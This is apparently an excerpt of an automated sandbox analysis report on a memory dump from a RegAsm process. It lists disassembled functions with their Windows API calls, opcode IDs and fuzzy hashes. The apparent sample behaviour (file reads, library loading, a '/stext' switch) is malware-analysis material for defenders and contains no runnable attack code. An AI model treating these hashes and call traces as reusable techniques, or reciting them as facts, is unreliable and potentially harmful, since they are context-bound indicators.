                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseHandleSleep
                                                                                                                                              • String ID: }A
                                                                                                                                              • API String ID: 252777609-2138825249
                                                                                                                                              • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                              • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                              • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                              • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                              APIs
                                                                                                                                              • malloc.MSVCRT ref: 00409A10
                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                              • free.MSVCRT ref: 00409A31
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: freemallocmemcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3056473165-0
                                                                                                                                              • Opcode ID: 7d74a04ce27a742131de704167b3a52b0161021cc553bd76998040dad9392745
                                                                                                                                              • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                              • Opcode Fuzzy Hash: 7d74a04ce27a742131de704167b3a52b0161021cc553bd76998040dad9392745
                                                                                                                                              • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset
                                                                                                                                              • String ID: BINARY
                                                                                                                                              • API String ID: 2221118986-907554435
                                                                                                                                              • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                              • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                              • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                              • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                              • _mbscpy.MSVCRT(0045E298,00000000,00000155,?,00405340,?,00000000,004055B5,?,00000000,00405522,?,?,?,00000000,00000000), ref: 00405250
                                                                                                                                              • _mbscat.MSVCRT ref: 0040525B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LibraryLoad$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 568699880-0
                                                                                                                                              • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                                              • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                                                                                                                                              • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                                                                                                                                              • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _wcsicmp
                                                                                                                                              • String ID: /stext
                                                                                                                                              • API String ID: 2081463915-3817206916
                                                                                                                                              • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                              • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                              • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                              • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040957A
                                                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$??2@CloseCreateHandleReadSize
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1023896661-0
                                                                                                                                              • Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                                                                              • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                                                                                                                                              • Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                                                                                                                                              • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2445788494-0
                                                                                                                                              • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                              • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                              • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                                              • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcmpmemset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1065087418-0
                                                                                                                                              • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                              • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                              • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                              • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                              • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00410654
                                                                                                                                                • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1381354015-0
                                                                                                                                              • Opcode ID: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                                                                                                                                              • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                              • Opcode Fuzzy Hash: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                                                                                                                                              • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                              • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                                                                                                                                              • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                                                                                                                                              • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                              • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2154303073-0
                                                                                                                                              • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                              • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                              • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                              • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                              APIs
                                                                                                                                              • SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$PointerRead
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3154509469-0
                                                                                                                                              • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                              • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                              • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                              • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                              APIs
                                                                                                                                              • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4232544981-0
                                                                                                                                              • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                              • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                              • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                              • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                              APIs
                                                                                                                                              • FreeLibrary.KERNEL32(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                              • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                              • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                              • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                              • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                              APIs
                                                                                                                                              • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileModuleName
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 514040917-0
                                                                                                                                              • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                              • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                              • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                              • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                              APIs
                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileRead
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                              • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                              • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                              • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                              • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                              APIs
                                                                                                                                              • WriteFile.KERNEL32(?,00000009,?,00000000,00000000), ref: 0040A325
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                              • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                              • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                              • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                              • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                              APIs
                                                                                                                                              • FreeLibrary.KERNEL32(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                              • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                              • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                              • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                              • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                              APIs
                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                              • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                              • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                              • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                              • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                              APIs
                                                                                                                                              • CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                              • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                              • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                              • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                              • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                              APIs
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 613200358-0
                                                                                                                                              • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                              • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                              • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                              • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                              APIs
                                                                                                                                              • FreeLibrary.KERNEL32(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                              • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                              • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                              • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                              • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                              APIs
                                                                                                                                              • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EnumNamesResource
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3334572018-0
                                                                                                                                              • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                              • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                              • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                              • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3664257935-0
